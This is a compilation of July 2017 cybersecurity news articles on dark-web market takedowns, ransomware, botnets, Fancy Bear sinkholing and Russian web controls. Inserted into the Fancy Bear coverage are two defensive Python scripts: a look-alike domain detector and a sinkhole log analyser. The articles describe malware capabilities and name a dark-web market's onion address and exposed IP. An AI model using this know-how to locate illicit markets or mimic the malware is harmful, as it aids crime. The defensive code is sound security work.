We are here with the outline of this week's stories, just in case you missed any of them. We recommend you read the entire thing (just click 'Read More' because there's some valuable advice in there as well).
Here's the list of this Week's Top Stories:
1. Feds Shut Down AlphaBay and Hansa Dark Web Markets — Dream Market Under Suspicion
On Thursday, Europol announced that the authorities had shut down two of the largest criminal Dark Web markets — AlphaBay and Hansa — in what's being called the largest-ever international operation against the dark web's black market conducted by the FBI, DEA and Dutch National Police.
Interestingly, the federal authorities shut down AlphaBay, but before taking down Hansa market, they took control of the Dark Web market and kept it running for at least a month in an effort to monitor the activities of its visitors, including a massive flood of Alphabay refugees.
After the shutdown of both AlphaBay and Hansa, Dream Market, which has been in business since 2013, has emerged as the leading player, but many dark web users now speculate that Dream Market is also under police control.
For detailed information — Read more.
2. New Ransomware Threatens to Send Your Internet History to All Your Friends
After WannaCry and Petya ransomware outbreaks, a new strain of ransomware has been making the rounds on the Google Play Store in bogus apps, which targets Android mobile phone users.
Dubbed LeakerLocker, instead of encrypting files on your device, this Android ransomware secretly collects personal images, messages and browsing history and then threatens to share them with your contacts if you don't pay $50 (£38).
For more detailed information on the LeakerLocker ransomware — Read more.
3. New CIA Leaks — Smartphone Hacking and Malware Development

WikiLeaks last week published the 16th batch of its ongoing Vault 7 leak, revealing the CIA's Highrise Project, which allowed the spying agency to stealthily collect and forward stolen data from compromised smartphones to its server through SMS messages.
This week, the whistleblowing organisation revealed details about a CIA contractor — Raytheon Blackbird Technologies — which was responsible for analysing advanced malware and hacking techniques being used in the wild by cyber criminals.
For more detailed information on Highrise Project and its contractor Raytheon Blackbird Technologies — Read More.
4. Three Back-to-Back Multi-Million Dollar Ethereum Heists in 20 Days
This week, an unknown hacker stole nearly $32 Million worth of Ethereum – one of the most popular and increasingly valuable cryptocurrencies – from wallet accounts linked to at least three companies by exploiting a critical vulnerability in Parity's Ethereum Wallet software.
This was the third Ethereum cryptocurrency heist, coming two days after an alleged hacker stole $7.4 Million worth of Ether from the trading platform CoinDash and two weeks after someone hacked into a South Korean cryptocurrency exchange and stole more than $1 Million in Ether and Bitcoins from user accounts.
For more detailed information about the Ethereum Heist — Read More.
5. Critical Gnome Flaw Leaves Linux PCs Vulnerable
This week has been bad for Linux users as well. A security researcher discovered a code injection vulnerability in the thumbnail handler component of GNOME Files file manager that allowed hackers to execute malicious code on targeted Linux machines.
German researcher Nils Dagsson Moskopp dubbed the vulnerability Bad Taste (CVE-2017-11421) and also released proof-of-concept (PoC) code on his blog to demonstrate the vulnerability.
For more details about the Bad Taste vulnerability and its PoC — Read More.
6. New Malware Exploits SambaCry to Hijack NAS Devices

Despite being patched in late May, the SambaCry vulnerability is currently being leveraged by a new piece of malware to target Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances.
SambaCry is a 7-year-old critical remote code execution (RCE) vulnerability (CVE-2017-7494) in the Samba networking software that could allow a hacker to remotely take full control of a vulnerable Linux or Unix machine.
The flaw was discovered and patched two months ago, but researchers at Trend Micro warned that the flaw had been actively exploited by the SHELLBIND malware that mostly targets NAS devices used by small and medium-size businesses.
For more detailed information on the SHELLBIND malware — Read More.
7. Devil's Ivy — Millions of Internet-Connected Devices At Risk
This week, researchers at the IoT-focused security firm Senrio discovered a critical remotely exploitable vulnerability in an open-source software development library used by major IoT manufacturers that eventually left millions of smart devices vulnerable to hacking.
Dubbed Devil's Ivy, the vulnerability (CVE-2017-9765) resides in the gSOAP toolkit (Simple Object Access Protocol), an advanced C/C++ auto-coding tool for developing XML Web services and XML applications.
The researchers also released proof-of-concept (PoC) video demonstrating the RCE on a security camera manufactured by Axis Communications.
For more detailed information on the Devil's Ivy and PoC video — Read More.
8. “Ubuntu Linux for Windows 10 Released” — Sounds So Weird?
Downloading an entire operating system has just become as easy as downloading an application for Windows 10 users, as Microsoft last week announced the availability of popular Linux distro 'Ubuntu' in the Windows App Store.
While the company announced its plans to launch Fedora and SUSE Linux on the Windows Store as well, it did not reveal exactly when its users can expect to see these two flavours of Linux distro on the App Store.
For detailed information on how to install and run Ubuntu on Windows 10 — Read More.
9. Over 70,000 Memcached Servers Vulnerable to Hacking

It's been almost eight months since the Memcached developers patched several critical remote code execution (RCE) vulnerabilities in the software, but tens of thousands of servers running the Memcached application are still vulnerable.
Cisco's Talos intelligence and research group last year discovered three critical RCE vulnerabilities in Memcached — a modern open-source and easily deployable distributed caching system that allows objects to be stored in memory.
The vulnerabilities exposed major websites including Facebook, Twitter, YouTube and Reddit to hackers, but the team of researchers scanned the internet on two different occasions and found that over 70,000 servers are still vulnerable to the attacks, including ransomware attacks similar to the one that hit MongoDB databases in late December.
For more in-depth information on the Memcached vulnerabilities — Read More.
10. Tor Launches Bug Bounty Program for Public
After announcing its intention to launch a public bug bounty program in late December 2015, the Tor Project has finally launched a "Bug Bounty Program," encouraging hackers and security researchers to find and privately report bugs that could compromise the anonymity network.
The bug bounty reports will be sent through HackerOne — a startup that operates bug bounty programs for companies including Yahoo, Twitter, Slack, Dropbox, Uber, General Motors – and even the U.S. Department of Defense for Hack the Pentagon initiative.
For detailed information on bug bounty prices and types of valid vulnerabilities — Read More.
Other Important News This Week
Besides these, there were lots of incidents this week, including:
Microsoft's smart move to help take down cyber espionage campaigns conducted by "Fancy Bear" hacking group.
A new credential stealing malware found being sold for as cheap as $7 on underground forums.
Cisco patched a highly critical RCE vulnerability in its WebEx browser extension for Chrome and Firefox, which could allow attackers to execute malicious code on a victim's computer remotely.
Windows 10 now lets you reset a forgotten password directly from your computer's Lock Screen.
Several critical vulnerabilities in Segway Ninebot miniPRO could allow hackers to remotely take "full control" over the hoverboard within range and leave riders out-of-control.
Ashley Madison's parent company Ruby Corp has agreed to pay a total of $11.2 Million to roughly 37 million users whose personal details were exposed in a massive data breach two years ago.


A Russian man involved in the development and maintenance of Citadel was sentenced to five years in prison
23.7.2017 securityaffairs  BigBrothers
The Russian hacker Mark Vartanyan was sentenced to five years in prison for his involvement in the development and maintenance of the Citadel botnets.
It’s a terrible moment for cyber criminals: law enforcement agencies worldwide continue their fight against illegal activities online, as the recent shutdown of the AlphaBay and Hansa black markets demonstrates.

The news of the day is that the Russian hacker Mark Vartanyan was sentenced to five years in prison for his involvement in the development and maintenance of the Citadel botnets.

Vartanyan, also known by the pseudonym “Kolypto”, was arrested in Norway and extradited to the United States in December 2016.

Kolypto pleaded guilty in court in March 2017; he was charged with one count of computer fraud.

“Citadel caused vast amounts of harm to financial institutions and individuals around the world. Mark Vartanyan utilized his technical expertise to enable Citadel into becoming one of the most pernicious malware toolkits of its time, and for that, he will serve significant time in federal prison,” said US Attorney John Horn.

Citadel started being offered for sale in 2011 on invite-only Russian cybercriminal forums. It is directly derived from the popular Zeus banking Trojan. In June 2013 Microsoft and the FBI carried out takedowns that eradicated more than 1,400 bots (nearly 88% of the overall Citadel botnet) associated with this malware.

citadel panel

Experts estimated that the malware has been responsible for over $500 million in financial fraud.

Over the years, the Citadel malware affected more than 11 million computers globally. The most recent variant derived from Citadel is Atmos, spotted in April 2016 when it infected more than 1,000 bots.

Vartanyan’s role was crucial for the malware’s distribution; the man was involved in developing, improving and maintaining Citadel. He was active between August 21, 2012 and January 9, 2013, while residing in Ukraine, and between on or about April 9, 2014 and June 2, 2014, while residing in Norway.

“Malicious software and botnets are rarely created by a single individual. Cybercrime is an organized team effort involving sophisticated, talented, and tech savvy individuals. Today’s sentencing of Mr. Vartanyan […] both removes a key resource from the cyber underworld and serves as a strong deterrent to others who may be contributing to the development of botnets and malware. The threat posed by cyber criminals in the U.S. and abroad is ever increasing,” David J. LeValley, Special Agent in Charge, FBI Atlanta Field Office, said.


Lloyd’s of London: A massive cyber attack could cause an average of $53 billion of economic losses
23.7.2017 securityaffairs 
Ransomware

A major global cyber attack has the potential to trigger $53 billion of economic losses, the equivalent to a natural disaster like 2012’s Superstorm Sandy.
Events like the massive WannaCry attack or the Ukraine power outage have raised the discussion about the possible economic losses caused by a cyber attack.

According to a new report published by Lloyd’s of London on Monday (“Counting the cost: Cyber exposure decoded”), a massive cyber attack on a global scale could cause an average of $53 billion of economic losses, a figure on par with a catastrophic natural disaster such as U.S. Superstorm Sandy in 2012.

“A major global cyber-attack has the potential to trigger $53 billion of economic losses, roughly the equivalent to a catastrophic natural disaster like 2012’s Superstorm Sandy, according to a scenario described in new research by Lloyd’s, the world’s specialist insurance market, and Cyence, a leading cyber risk analytics modelling firm.” states a blog post published by Lloyd’s of London.

The figure is disconcerting; experts compared it with the losses caused by a natural disaster such as Superstorm Sandy, which hit the US in 2012.

“The report, co-written with risk-modeling firm Cyence, examined potential economic losses from the hypothetical hacking of a cloud service provider and cyber attacks on computer operating systems run by businesses worldwide.” reported Reuters.

Insurers are trying to estimate the economic impact of a cyber attack and their potential exposure to cyber risks, and believe me, it is very difficult to do due to the lack of historical data on this kind of incident.

“This report gives a real sense of the scale of damage a cyber-attack could cause the global economy. Just like some of the worst natural catastrophes, cyber events can cause a severe impact on businesses and economies, trigger multiple claims and dramatically increase insurers’ claims costs. Underwriters need to consider cyber cover in this way and ensure that premium calculations keep pace with the cyber threat reality.” said Lloyd’s of London Chief Executive Inga Beale.

“We have provided these scenarios to help insurers gain a better understanding of their cyber risk exposures so they can improve their portfolio exposure management and risk pricing, set appropriate limits and expand into this fast-growing, innovative insurance class with confidence.”

According to Cyence, economic costs in the hypothetical cloud provider attack could reach $8 billion globally for cases like the “WannaCry” ransomware that hit targets in more than 100 countries.

cyber attack WannaCrypt ransomware

Economic costs could include business interruptions and computer repairs.

In June, the “NotPetya” ransomware infected systems worldwide, causing $850 million in economic costs.

According to the report, in the hypothetical cloud service attack, hackers deliver malware into a cloud provider’s software that is designed to trigger system crashes among users a year later.

The malware then propagates among the provider’s customers, infecting systems in almost any industry, from financial services to healthcare.

The experts estimated average economic losses caused by the disruption of the victims’ operations could range from $4.6 billion to $53 billion for massive cyber attacks.

“But actual losses could be as high as $121 billion, the report said.” continues Reuters.

“As much as $45 billion of that sum may not be covered by cyber policies due to companies underinsuring, the report said.”

The report estimates average losses for a scenario involving a hacking of operating systems ranged from $9.7 billion to $28.7 billion.

“Lloyd’s has a 20 percent to 25 percent share of the $2.5 billion cyber insurance market,” added Beale.

Download the ‘Counting the cost: Cyber exposure decoded’ report


Russia’s Duma has approved the bill to prohibit tools used to surf outlawed websites
23.7.2017 securityaffairs  BigBrothers

Russia is going to tighten controls on web services: on Friday, the parliament voted to prohibit web tools that could be used to surf outlawed websites.
Recently Russian authorities threatened to ban Telegram because it refused to comply with data protection laws.

On Friday, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites.

On the same day, the Duma also approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

Russia is going to tighten controls on web services; for this reason, members of the Duma passed the questionable bill, which will prohibit the use from Russian territory of any service that could be used to access blacklisted websites.

If the law is approved by the upper chamber of the Russian Parliament and by President Vladimir Putin, Roskomnadzor will manage a list of anonymizer services and will ban those that are not compliant with the access restrictions ordered by the Russian Government.

Privacy advocacy groups fear the bill, which is considered too restrictive and could open the door to strict censorship; government opposition groups heavily rely on this kind of technology to extend their protest abroad.

Let me close with a look at the Tor Metrics on Russian users accessing the popular anonymizing service.

Duma on outlawed websites Tor metrics

The data on the top 10 countries by estimated number of directly-connecting clients shows that Russia is in third place.

COUNTRY MEAN DAILY USERS
United States 437521 (20.01 %)
United Arab Emirates 320743 (14.67 %)
Russia 213318 (9.76 %)
Ukraine 180847 (8.27 %)
Germany 176053 (8.05 %)
France 87925 (4.02 %)
United Kingdom 75001 (3.43 %)
Canada 41001 (1.88 %)
Netherlands 40586 (1.86 %)
Italy 37230 (1.70 %)


Stantinko botnet was undetected for at least 5 years while infecting half a million systems
23.7.2017 securityaffairs 
BotNet

A huge botnet dubbed Stantinko was undetected for at least 5 years, the disconcerting discovery was made by researchers from security firm ESET.
According to ESET, the Stantinko botnet has infected around half a million computers worldwide. Operators behind the botnet powered a massive adware campaign active since 2012, crooks mainly targeted users in Russia and Ukraine searching for pirated software.

The researchers discovered that the attack vector used by the cyber criminals is an app called FileTour, which installs a variety of programs on the victim’s machine while also launching Stantinko in the background.

“Making heavy use of code encryption and rapidly adapting so as to avoid detection by anti-malware, Stantinko’s operators managed to stay under the radar for at least the last five years, attracting very little attention to their operations.” states the analysis published by ESET.

The botnet is mainly used to install browser extensions on the infected systems that inject ads and perform click fraud.

The malicious browser extensions installed by the Stantinko malware are called The Safe Surfing and Teddy Protection. Both extensions, distributed through the Chrome Web Store, are used to block unwanted URLs; the botnet installs its own versions of both extensions, which are able to receive a configuration to perform click fraud and ad injection.

The researchers also noticed that the Stantinko malware could be used to take full control of the target systems: it leverages services that allow attackers to conduct several malicious activities (e.g. performing massive searches on Google and brute-force attacks on Joomla and WordPress installs).

The malware installs two specific Windows services after compromise, each of which is able to reinstall the other if it is deleted. This means that in order to sanitize the system both services must be removed at the same time.

Stantinko botnet

The Stantinko malware is a modular backdoor; its components embed a loader allowing them to execute any Windows executable sent by the C&C server directly in memory.

“This feature is used as a very flexible plugin system allowing the operators to execute anything on an infected system. Table 1 is a description of known Stantinko plugins.”

Table 1: Known Stantinko plugins (module name: analysis)

Brute-force: Distributed dictionary-based attack on Joomla and WordPress administrative panels.
Search Parser: Performs massive distributed and anonymous searches on Google to find Joomla and WordPress websites. It uses compromised Joomla websites as C&C servers.
Remote Administrator: Backdoor that implements a full range of actions from reconnaissance to data exfiltration.
Facebook Bot: Bot performing fraud on Facebook. Its capabilities include creating accounts, liking pictures or pages, and adding friends.

Experts speculate that the crooks work closely with the advertisers that pay for the traffic they receive from the botnet.

“On the other hand, traditional click-fraud malware relies on a series of redirections between several ad networks to launder their malicious traffic. This shows that not only are the Stantinko operators able to develop highly stealthy malware, but they are also able to abuse the traditional ad-serving economy without getting caught,” ESET points out.


Microsoft sued Fancy Bear to gain control of the domains used in the cyber espionage campaigns
22.7.2017 securityaffairs
APT

Microsoft used the lawsuit to disrupt a large number of cyber espionage campaigns conducted by infamous Fancy Bear APT hacking group
We have discussed hacking back several times, and the case we are going to analyze is a good example of an alternative approach to hitting back at an APT group.
Microsoft used the lawsuit to disrupt a large number of cyber espionage campaigns conducted by the infamous Fancy Bear APT hacking group (APT28, Sofacy, Sednit, and Pawn Storm). With the help of the authorities, and using the lawsuit as a tool, the experts took over the command and control infrastructure of the group in order to analyze the traffic and the targets of the malware.

“A new offensive by Microsoft has been making inroads against the Russian government hackers behind last year’s election meddling, identifying over 120 new targets of the Kremlin’s cyber spying, and control-alt-deleting segments of Putin’s hacking apparatus.” reported The Daily Beast.

“How are they doing it? It turns out Microsoft has something even more formidable than Moscow’s malware: Lawyers.”
Microsoft sued Fancy Bear in a US federal court, accusing the APT group of computer intrusion, cybersquatting, and registering several domain names that violate Microsoft’s trademarks.
Fancy Bear has been active since at least 2007 and was one of the APT groups involved in the numerous cyber attacks against the US DNC and the 2016 Presidential Election.

Numerous reports published by security firms linked the APT group to the GRU (General Staff Main Intelligence Directorate), the Russian secret military intelligence agency.
The experts at Microsoft observed that Fancy Bear hackers often use domain names that look like Microsoft products and services, such as livemicrosoft[.]net and rsshotmail[.]com, for their cyber espionage campaigns.

Microsoft exploited this abuse to sue the hacking group, with its “unknown members”, in court and gain ownership of the domains used by Fancy Bear to deliver malware.

“These servers can be thought of as the spymasters in Russia’s cyber espionage, waiting patiently for contact from their malware agents in the field, then issuing encrypted instructions and accepting stolen documents,” the report reads.

Fancy bear

Last year, U.S. District Judge Gerald Bruce Lee granted Microsoft’s request and issued a then-sealed order to domain name registrars “compelling them to alter” the DNS of at least 70 Fancy Bear domains. The traffic was redirected to servers controlled by Microsoft.
Technically the procedure is called ‘sinkholing’, and it allows investigators to monitor the traffic from the infected systems in order to track the botnet infrastructure.

This is the precious work done by Microsoft’s Digital Crimes Unit, which has identified the potential victims of the Russian APT.
“By analyzing the traffic coming to its sinkhole, the company’s security experts have identified 122 new cyber espionage victims, whom it’s been alerting through Internet service providers,” the report reads.

Microsoft is still waiting for a final judgment in the Fancy Bear case. The hearing has been scheduled for Friday in a Virginia court.

“Microsoft concludes in court filings that its efforts have had “significant impact” on Fancy Bear’s operations. By analyzing the traffic coming to its sinkhole, the company’s security experts have identified 122 new cyber espionage victims, whom it’s been alerting through Internet service providers.” concludes the report. “On Friday, the company is set to ask Magistrate Judge Theresa Carroll Buchanan for a final default judgment against Fancy Bear, and for a permanent injunction giving Microsoft ownership of the domains it’s seized.”
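An added example, not Microsoft's tooling: a small detector for brand look-alike domains run over constructed resolver log lines (the two flagged names are the ones cited above), plus RPZ records that steer such names to a sinkhole; the brand list, log format and sinkhole host are assumptions.

```python
import re

# Brand tokens to watch for and the apexes that may legitimately carry them (assumed lists).
BRAND_TOKENS = ("microsoft", "hotmail", "outlook", "office365")
LEGITIMATE_APEXES = {"microsoft.com", "hotmail.com", "outlook.com", "live.com", "office.com"}

# Constructed resolver log format: "<timestamp> <client-ip> query <qname>"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qname>\S+)$")

# Constructed sample lines; the two look-alike names are the ones cited in the article.
SAMPLE_LOG = """\
2017-07-21T09:58:01Z 10.0.0.5 query login.live.com.
2017-07-21T09:58:07Z 10.0.0.7 query www.livemicrosoft.net.
2017-07-21T09:58:09Z 10.0.0.5 query mail.outlook.com.
2017-07-21T09:58:12Z 10.0.0.9 query rsshotmail.com.
2017-07-21T09:58:15Z 10.0.0.9 query example.org.
2017-07-21T09:58:20Z 10.0.0.7 query www.livemicrosoft.net.
"""


def registrable_domain(qname: str) -> str:
    """Last two labels, lower-cased, trailing dot removed. Sufficient for .com/.net;
    a production version would consult the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def is_lookalike(qname: str) -> bool:
    """True when the registrable domain embeds a brand token but is not a known apex."""
    apex = registrable_domain(qname)
    if apex in LEGITIMATE_APEXES:
        return False
    second_level = apex.split(".")[0]
    return any(token in second_level for token in BRAND_TOKENS)


def scan_log(text: str) -> dict:
    """Map each flagged look-alike domain to the set of clients that queried it."""
    hits = {}
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a query record
        if is_lookalike(m["qname"]):
            hits.setdefault(registrable_domain(m["qname"]), set()).add(m["client"])
    return hits


def rpz_records(domains, sinkhole_host: str) -> list:
    """Response Policy Zone lines that send the flagged names (and their subdomains)
    to an investigator-controlled sinkhole: a resolver-side counterpart to the
    registrar-level DNS redirection described in the article."""
    lines = []
    for name in sorted(domains):
        lines.append(f"{name} CNAME {sinkhole_host}.")
        lines.append(f"*.{name} CNAME {sinkhole_host}.")
    return lines
```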


Modified versions of Nukebot Trojan spotted in wild after code leak
22.7.2017 securityaffairs Virus

Apparently, different cyber gangs are using modified versions of Nukebot in the wild after its source code leaked in March 2017.
Crooks are adapting the leaked source code for the Nukebot banking Trojan to target banks in the United States and France and to steal mail client and browser passwords.

Apparently, different cyber gangs have been using modified versions of Nukebot in the wild since its source code was leaked in March.


In March, the source code for a new banking Trojan, dubbed Nuclear Bot (Nukebot), was offered for sale in the cybercriminal underground. The Nuclear Bot banking Trojan first appeared on cybercrime forums in early December, when it was offered for $2,500. The malicious code implements features commonly seen in banking Trojans: it is able to inject code into the Mozilla Firefox, Internet Explorer and Google Chrome browsers and steal sensitive data entered by users.

The Trojan can also open a local proxy or hidden remote desktop service to allow crooks to initiate rogue transactions through the victims’ browsers after they have been tricked into providing the second authentication factor.

The creator of the malware lost his credibility over the months and has been flagged as a scammer in the hacking community. The malware author did not offer a test version of the malware to potential buyers and advertised the Nuclear Bot using different names on different cybercrime forums.

In order to gain credibility and notoriety in the cybercrime underground, he released the Trojan’s source code.

The NukeBot Trojan appears to be a powerful tool written from scratch that, in early-stage attacks, was able to evade detection by antivirus solutions.

Now malware experts from Kaspersky Lab have detected several compiled samples of Nukebot Trojan created since March, many of which appear to be test samples.

“The publication of malware source code may be nothing new, but it still attracts attention from across the IT community and some of that attention usually goes beyond just inspecting the code. The NukeBot case was no exception: we managed to get our hands on a number of compiled samples of the Trojan,” wrote the experts from Kaspersky.

“Most of them were of no interest, as they stated local subnet addresses or ‘localhost/127.0.0.1’ as the C&C address. Far fewer samples had ‘genuine’ addresses and were ‘operational.’”

The analysis of compiled samples revealed that only five percent were being used in real attacks, but there is no information about the campaign leveraging these samples.

The implementations of web injections in the source code confirm that hackers are using it to target banks in France and the U.S.

Researchers extracted the IP addresses of the command and control servers from the plaintext versions of the code in their possession. The operational versions of Nukebot, of course, were encrypted, so the researchers had to extract the keys in order to decode them.

“In order to trigger web injections, we had to imitate interaction with C&C servers. The C&C addresses can be obtained from the string initialization procedure,” continues the analysis. “When first contacting a C&C, the bot is sent an RC4 key which it uses to decrypt injections. We used this simple logic when implementing an imitation bot, and managed to collect web injections from a large number of servers.”

“Initially, the majority of botnets only received test injects that were of no interest to us,” Yunakovsky said. “Later, however, we identified a number of NukeBot’s ‘combat versions.’”

Experts also noticed that some modified versions of Nukebot lack web injections. These variants are delivered via droppers; once unpacked, the malicious code downloads a number of password recovery utilities from a remote server under the attacker’s control.


Dark Web Users Suspect "Dream Market" Has Also Been Backdoored by Feds

22.7.2017 thehackernews  CyberCrime

By now you might be aware of the takedown of two of the largest dark web marketplaces—AlphaBay and Hansa—in what's being called the largest-ever international operation against the dark web's black market, conducted by the FBI, DEA (Drug Enforcement Agency) and Dutch National Police.
But the interesting aspect of the takedown was that the federal authorities shut down AlphaBay, but took control of the Hansa market and kept it running for at least a month in an effort to monitor the activities of its visitors.
Hansa's visitors also included a massive flood of AlphaBay refugees, as the seizure of the AlphaBay market forced its users to move to Hansa for illegal trading and purchasing.
However, not just Hansa, after AlphaBay's shutdown, many of its users also joined another website known as Dream Market, which is believed to be the second-largest dark web marketplace, ahead of Hansa.
After the shutdown of both AlphaBay and Hansa, Dream Market has emerged as the leading player, but now some Reddit users on several "r/Dream_Market" threads have expressed concerns about the Dream Market, which has been in business since 2013.
One Reddit user said that Dream Market has been compromised in a similar manner as Hansa and is already under police control.
"I got contacted by an ex-Hansa staff member telling me that the operation is apparently bigger than we currently assume, that 'there will be a bloodbath, a purge' and that 'any vendor on HANSA should immediately seize his operation, lawyer up and hide his trails'," the Reddit user's post read.
Possibly the Real IP of Dream Market "Mistakenly" Exposed

Another Redditor claimed to have discovered a non-encrypted IP address in Dream Market’s source code, saying that police might have taken over control of the dark market as well and are now actively monitoring its visitors.
"We found a clear address IP on the javascript source code of the market. The police must know it from a long time. GO AWAY FROM HERE RIGHT NOW !!!," the Redditor wrote, along with a piece of the site's source code.
After exploring a bit, I found that the clearnet IP address 194.9.94.82 mentioned in the JavaScript file (lchudifyeqm4ldjj.onion/market.js) is owned by "Loopia AB," a Swedish hosting company.
This JavaScript file has not been added or altered recently; according to some moderators, the file has been there for at least the past nine months, and the code itself doesn't indicate any signs of hijacking or interception.
However, here's the big blunder — exposing the possible real IP address of a server that is supposed to be hidden behind the Tor network is one of the biggest mistakes the Dream Market operators could have made, and it may already have given law enforcement agencies an opportunity to raid the hosting company and take control of the servers.
While the claims that Dream Market is under police control are yet to be verified, vendors who joined Dream Market may still be compromised by law enforcement.
Meanwhile, some anonymous users on Reddit are also encouraging dark web users to visit Dream Market, saying "CALM DOWN! DREAM IS WORKING FINE!"
Having benefited from the shutdown of its rivals, Dream Market had 57,000 listings for drugs and 4,000 listings for opioids on Thursday.


How Microsoft Cleverly Cracks Down On "Fancy Bear" Hacking Group

22.7.2017 thehackernews  CyberSpy

What could be the best way to take over and disrupt cyber espionage campaigns?
Hacking them back?
Probably not. At least not when it's Microsoft, who is continuously trying to protect its users from hackers, cyber criminals and state-sponsored groups.
It has now been revealed that Microsoft has taken a different approach to disrupting a large number of cyber espionage campaigns conducted by the "Fancy Bear" hacking group, using a lawsuit as a tool — the tech company cleverly hijacked some of the group's servers with the help of the law.
Microsoft used its legal team last year to sue Fancy Bear in a federal court outside Washington DC, accusing the hacking group of computer intrusion, cybersquatting, and reserving several domain names that violate Microsoft's trademarks, according to a detailed report published by the Daily Beast.
Fancy Bear — also known as APT28, Sofacy, Sednit, and Pawn Storm — is a sophisticated hacking group that has been in operation since at least 2007 and has also been accused of hacking the Democratic National Committee (DNC) and Clinton Campaign in an attempt to influence the U.S. presidential election.
The hacking group is believed to be associated with the GRU (General Staff Main Intelligence Directorate), Russian secret military intelligence agency, though Microsoft has not mentioned any connection between Fancy Bear and the Russian government in its lawsuit.
Instead of registering generic domains for its cyber espionage operations, Fancy Bear often picked domain names that resemble Microsoft products and services, such as livemicrosoft[.]net and rsshotmail[.]com, in order to carry out its hacking and cyber espionage campaigns.
This inadvertently gave Microsoft an opportunity to drag the hacking group, whose members are "unknown," into court.
Microsoft Sinkholed Fancy Bear Domains
The purpose of the lawsuit was not to bring the criminal group to the court; instead, Microsoft appealed to the court to gain the ownership of Fancy Bear domains — many of which act as command-and-control servers for various malware distributed by the group.
"These servers can be thought of as the spymasters in Russia's cyber espionage, waiting patiently for contact from their malware agents in the field, then issuing encrypted instructions and accepting stolen documents," the report reads.
Although Microsoft has not yet gained full ownership of those domains, the judge last year issued a then-sealed order to domain name registrars "compelling them to alter" the DNS of at least 70 Fancy Bear domains and point them to Microsoft-controlled servers.
Eventually, Microsoft used the lawsuit as a tool to create sinkhole domains, allowing the company's Digital Crimes Unit to actively monitor the malware infrastructures and identify potential victims.
"By analyzing the traffic coming to its sinkhole, the company’s security experts have identified 122 new cyber espionage victims, whom it’s been alerting through Internet service providers," the report reads.
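The two Fancy Bear articles above describe the same technique: once the seized domains resolve to a server the investigators control, every infected host that beacons to them identifies itself, and the operator that owns the source address can be asked to alert its customer. The script below is an added illustration of that analysis; it is not Microsoft Digital Crimes Unit code. The web-server log lines, the prefix-to-ISP table and the log format with the requested host name appended are constructed for this example (the two domain names are the ones named in the articles, written without defanging so the lines parse like a real log).

```python
"""Summarise traffic arriving at a sinkhole that now answers for seized C&C
domains: which source addresses beaconed to which domain, and which network
operator should be notified about each.

Added example; not Microsoft's code. Log lines and the prefix table are
constructed for this example.
"""
from collections import defaultdict
import ipaddress
import re

# Constructed web-server log lines in combined format with the requested
# host name appended as a final field (a custom log format; an assumption).
SINKHOLE_LOG = """\
203.0.113.17 - - [20/Jul/2017:08:15:01 +0000] "POST /check.php HTTP/1.1" 200 12 "-" "Mozilla/4.0" livemicrosoft.net
203.0.113.17 - - [20/Jul/2017:08:20:01 +0000] "POST /check.php HTTP/1.1" 200 12 "-" "Mozilla/4.0" livemicrosoft.net
198.51.100.9 - - [20/Jul/2017:08:21:44 +0000] "GET /update HTTP/1.1" 200 12 "-" "Mozilla/4.0" rsshotmail.com
198.51.100.40 - - [20/Jul/2017:09:02:10 +0000] "POST /check.php HTTP/1.1" 200 12 "-" "Mozilla/4.0" livemicrosoft.net
192.0.2.77 - - [20/Jul/2017:09:10:33 +0000] "GET /update HTTP/1.1" 200 12 "-" "Mozilla/4.0" rsshotmail.com
"""

# Constructed mapping of address blocks to the operator that can reach the
# subscriber; in practice this comes from WHOIS / RIR data.
PREFIX_TO_ISP = {
    "203.0.113.0/24": "ExampleNet ISP",
    "198.51.100.0/24": "Sample Telecom",
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "[^"]*" (?P<host>\S+)$'
)


def parse_line(line):
    """Return (source_ip, requested_host) or None for a malformed line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group("ip"), m.group("host").lower()


def victims_by_domain(log_text):
    """Map each sinkholed domain to the set of distinct source addresses that
    contacted it; every such address is a candidate infected host."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ip, host = parsed
            hits[host].add(ip)
    return dict(hits)


def isp_for(ip, table=PREFIX_TO_ISP):
    """Find the operator responsible for an address, or 'unknown'."""
    addr = ipaddress.ip_address(ip)
    for prefix, isp in table.items():
        if addr in ipaddress.ip_network(prefix):
            return isp
    return "unknown"


def notification_list(log_text, table=PREFIX_TO_ISP):
    """Group candidate victims by operator so each ISP receives one report
    listing the addresses, and the domains they contacted, to alert on."""
    report = defaultdict(dict)
    for domain, ips in victims_by_domain(log_text).items():
        for ip in ips:
            report[isp_for(ip, table)].setdefault(ip, set()).add(domain)
    return {isp: {ip: sorted(doms) for ip, doms in entries.items()}
            for isp, entries in report.items()}


if __name__ == "__main__":
    for isp, entries in notification_list(SINKHOLE_LOG).items():
        print(isp)
        for ip, domains in sorted(entries.items()):
            print("  ", ip, "->", ", ".join(domains))
```

Repeated beacons from one address are collapsed into a single victim entry, and addresses outside the known prefixes land under "unknown" so they are not silently dropped from the report.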
Microsoft has asked for a final default judgment against Fancy Bear and is still waiting for it; the hearing has been scheduled for Friday in a Virginia court.


Russia Moves to Ban Tools Used to Surf Outlawed Websites

22.7.2017 securityweek BigBrothers

Russia's parliament on Friday voted to outlaw web tools that allow internet users to sidestep official bans of certain websites, the nation's latest effort to tighten controls of online services.

Members of the lower house, the Duma, passed the bill to prohibit the services from Russian territory if they were used to access blacklisted sites.

The bill instructs Russia's telecommunications watchdog Roskomnadzor to compile a list of anonymizer services and prohibit any that fail to respect the bans issued in Russia on certain websites.

The proposed law still has to be approved by the upper chamber of parliament and then by President Vladimir Putin.

Several internet-based groups in Russia have condemned it as too vaguely formulated and too restrictive.

The Duma also approved moves Friday to oblige anyone using an online message service to identify themselves with a telephone number.

Russia's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media.

But the Russian authorities have begun to tighten controls on online services, citing security concerns.

In June, Russian officials threatened to ban the Telegram messaging app after the FSB security service said those behind April's deadly Saint Petersburg metro bombing had used it.


Citadel Author Sentenced to Five Years in Prison

